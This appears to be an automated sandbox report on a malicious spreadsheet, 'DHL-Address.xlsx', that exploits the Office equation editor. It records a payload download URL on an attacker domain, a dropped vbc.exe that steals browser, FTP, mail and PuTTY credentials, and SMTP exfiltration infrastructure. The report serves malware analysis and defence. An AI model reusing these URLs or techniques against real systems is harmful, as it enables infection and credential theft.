              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 552, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information31Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSecurity Software Discovery211Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion13SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 339078 Sample: DHL-Address.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Antivirus detection for URL or domain 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 17 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 13 2->12         started        process3 dnsIp4 29 globuserinessserverfiletransferprotocol.mangospot.net 192.210.214.178, 49165, 80 AS-COLOCROSSINGUS United States 7->29 21 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\Users\user\Desktop\~$DHL-Address.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->49 51 Machine Learning detection for dropped file 14->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->53 55 Injects a PE file into a foreign processes 14->55 17 vbc.exe 4 14->17         started        process9 dnsIp10 27 smtp.privateemail.com 199.193.7.228, 49166, 49168, 587 NAMECHEAP-NETUS United States 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              DHL-Address.xlsx48%VirustotalBrowse
              DHL-Address.xlsx49%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
              DHL-Address.xlsx100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\vbc.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              globuserinessserverfiletransferprotocol.mangospot.net4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://api.ipify.org%0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              http://servername/isapibackend.dll0%Avira URL Cloudsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              globuserinessserverfiletransferprotocol.mangospot.net
              		192.210.214.178
              		truetrueunknown
              smtp.privateemail.com
              		199.193.7.228
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exetrue
                • Avira URL Cloud: malware
                		unknown
                https://jUxNbkiTmoSYxyvoDh.nettrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.a-cert.at0Evbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.e-me.lv/repository0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.acabogacia.org/doc0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.chambersign.org/chambersroot.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.certifikat.dk/repository0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.chambersign.org1vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.diginotar.nl/cps/pkioverheid0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.pkioverheid.nl/policies/root-policy0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.ssc.lt/root-c/cacrl.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://ca.disig.sk/ca/crl/ca_disig.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.certplus.com/CRL/class3P.crl0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://repository.infonotary.com/cps/qcps.html0$vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.post.trust.ie/reposit/cps.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.certplus.com/CRL/class2.crl0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.disig.sk/ca/crl/ca_disig.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://ocsp.infonotary.com/responder.cgi0Vvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.sk.ee/cps/0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Evbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://api.ipify.org%vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		low
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://servername/isapibackend.dllvbc.exe, 00000005.00000002.2363028590.0000000006E50000.00000002.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://www.ssc.lt/cps03vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.oces.certifikat.dk/oces.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.certicamara.com/dpc/0Zvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                  		high
                  http://crl.pki.wellsfargo.com/wsprca.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    		high
                    http://www.dnie.es/dpc0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.rootca.or.kr/rca/cps.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.trustcenter.de/guidelines0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://certificates.starfieldtech.com/repository/1604vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                      		high
                      http://smtp.privateemail.comvbc.exe, 00000005.00000002.2360554779.0000000002658000.00000004.00000001.sdmpfalse
                        		high
                        http://www.entrust.net/CRL/Client1.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.disig.sk/ca0fvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sk.ee/juur/crl/0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.chambersign.org/chambersignroot.crl0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.xrampsecurity.com/XGCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.quovadis.bm0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.ssc.lt/root-a/cacrl.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.firmaprofesional.com0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.netlock.net/docsvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.entrust.net/2048ca.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                              		high
                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                		high
                                http://cps.chambersign.org/cps/publicnotaryroot.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.e-trust.be/CPS/QNcertsvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.certicamara.com/certicamaraca.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  		high
                                  http://fedir.comsign.co.il/crl/ComSignCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://ocsp.sectigo.com0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://ocsp.entrust.net03vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://cps.chambersign.org/cps/chambersroot.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.acabogacia.org0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://MLrjrg.comvbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ca.sia.it/seccli/repository/CPS0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.securetrust.com/STCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.certicamara.com/certicamaraca.crl0;vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.e-szigno.hu/RootCA.crt0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.quovadisglobal.com/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.valicert.com/1vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.e-szigno.hu/SZSZ/0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                          		high
                                          https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		low
                                          http://www.%s.comPAvbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		low
                                          http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
